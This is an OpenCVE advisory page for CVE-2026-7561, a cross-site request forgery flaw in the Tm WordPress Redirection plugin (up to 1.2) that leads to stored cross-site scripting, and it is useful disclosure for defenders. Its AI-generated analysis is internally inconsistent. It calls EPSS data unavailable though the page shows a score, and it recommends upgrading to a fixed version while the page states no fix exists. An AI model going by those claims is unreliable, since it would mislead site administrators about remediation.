Description
The Tm – WordPress Redirection plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
Published: 2026-05-12
Score: 6.1 Medium
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

The Tm‑WordPress Redirection plugin suffers from a missing or incorrect nonce check on the redirect configuration endpoint. This flaw allows an attacker who can lure an administrator to click a crafted URL to change the plugin’s settings. The victim’s browser subsequently loads malicious JavaScript stored in those settings, which runs with the administrator’s privileges against the site. The weakness is a classic Cross‑Site Request Forgery (CWE‑352) that leads to stored cross‑site scripting.

Affected Systems

Any WordPress installation running the Tm‑WordPress Redirection plugin from vendor tienrocker with a version up to and including 1.2. No additional version ranges are specified beyond "up to 1.2".

Risk and Exploitability

The CVSS score of 6.1 classifies this vulnerability as medium severity. EPSS data are unavailable, so exploitation probability cannot be quantified, and the vulnerability is not listed in the CISA KEV catalog. The attacker must be able to convince an administrator to visit a malicious link, making the attack vector "user interaction". Because the plugin is widely used on publicly exposed WordPress sites, the potential impact could be a full compromise of the admin account should the stored script achieve privilege escalation or defacement.

Generated by OpenCVE AI on May 12, 2026 at 10:41 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade the Tm‑WordPress Redirection plugin to a version newer than 1.2, which includes proper nonce validation on settings updates.
  • If an upgrade is not possible, remove the plugin entirely or disable its configuration interface to prevent changes made via forged requests.
  • As a temporary workaround, restrict administrative access to trusted IP ranges or enforce two‑factor authentication so that a malicious link is less likely to be executed by a legitimate admin.

Generated by OpenCVE AI on May 12, 2026 at 10:41 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Tue, 12 May 2026 13:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Tue, 12 May 2026 08:30:00 +0000

Type Values Removed Values Added
Description The Tm – WordPress Redirection plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
Title Tm – WordPress Redirection <= 1.2 - Cross-Site Request Forgery to Stored Cross-Site Scripting
Weaknesses CWE-352
References
Metrics cvssV3_1

{'score': 6.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}

Subscriptions

No data.

cve-icon MITRE

Status: PUBLISHED

Assigner: Wordfence

Published:

Updated: 2026-05-12T12:55:54.202Z

Reserved: 2026-04-30T20:01:15.359Z

Link: CVE-2026-7561

cve-icon Vulnrichment

Updated: 2026-05-12T12:54:15.642Z

cve-icon NVD

Status : Deferred

Published: 2026-05-12T09:16:57.310

Modified: 2026-05-12T14:03:52.757

Link: CVE-2026-7561

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-05-12T10:45:14Z

Weaknesses